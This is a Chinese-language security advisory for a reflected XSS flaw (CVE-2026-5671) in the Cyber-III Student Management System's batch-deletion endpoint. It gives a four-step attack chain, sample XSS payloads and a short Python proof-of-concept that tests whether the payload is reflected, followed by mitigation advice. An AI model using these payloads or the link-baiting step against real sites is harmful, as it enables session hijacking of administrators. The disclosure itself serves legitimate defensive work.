CVE-2026-5671 CVSS 4.3 中危

CVE-2026-5671 Cyber-III学生管理系统XSS漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5671

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Cyber-III Student-Management-System

漏洞概述

Cyber-III学生管理系统中存在跨站脚本漏洞，影响`/admin/class schedule/delete_batch.php`端点。由于系统未对`batch`参数进行严格的过滤和转义，攻击者可远程诱导用户访问恶意链接，从而在受害者浏览器中执行任意JavaScript代码，导致数据完整性受损。

技术细节

该漏洞属于XSS漏洞，具体位于Class Schedule Deletion Endpoint组件。在处理`delete_batch.php`请求时，后端直接获取并使用了`batch`参数的值，未经过任何安全净化处理便输出到了HTML页面中。攻击者可构造包含恶意脚本（如`<img src=x onerror=alert(1)>`）的Payload。由于攻击向量显示需要用户交互（UI:R），攻击者通常通过社会工程学手段诱导管理员点击恶意链接。一旦触发，脚本将在管理员权限上下文中运行，可能导致会话劫持或恶意操作。

攻击链分析

STEP 1

信息收集

攻击者识别出目标使用了Cyber-III学生管理系统，并定位到存在缺陷的`/admin/class schedule/delete_batch.php`端点。

STEP 2

构造载荷

攻击者编写包含恶意JavaScript代码的Payload，并将其赋值给`batch`参数。

STEP 3

诱导攻击

攻击者通过电子邮件或即时通讯工具，将包含恶意参数的URL发送给管理员或具有权限的用户。

STEP 4

执行代码

受害者点击链接，浏览器向服务器发送请求。服务器响应中包含未转义的Payload，导致恶意脚本在受害者浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-5671
import requests

target = "http://target-host.com/admin/class%20schedule/delete_batch.php"

# Malicious payload to test XSS
payload = '"><script>alert("CVE-2026-5671_PoC")</script>'

params = {
    "batch": payload
}

try:
    response = requests.get(target, params=params, timeout=5)
    if payload in response.text:
        print(f"[+] Vulnerability confirmed! Payload reflected in response.")
        print(f"[+] Target: {target}?batch={payload}")
    else:
        print("[-] Payload not reflected, might be filtered.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Cyber-III Student-Management-System <= commit 1a938fa61e9f735078e9b291d2e6215b4942af3f

防御指南

临时缓解措施

建议开发者立即审查并修复`delete_batch.php`文件中的输出逻辑，确保对`batch`参数进行转义。在官方修复前，应限制对该管理端点的访问权限，仅允许可信IP访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5671
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5671
3 Details https://www.cvedetails.com/cve/CVE-2026-5671/
4 VulDB https://vuldb.com/cve/CVE-2026-5671
5 Link https://github.com/Cyber-III/Student-Management-System/
6 Link https://github.com/Cyber-III/Student-Management-System/issues/242
7 Link https://vuldb.com/submit/786028
8 Link https://vuldb.com/vuln/355493
9 Link https://vuldb.com/vuln/355493/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表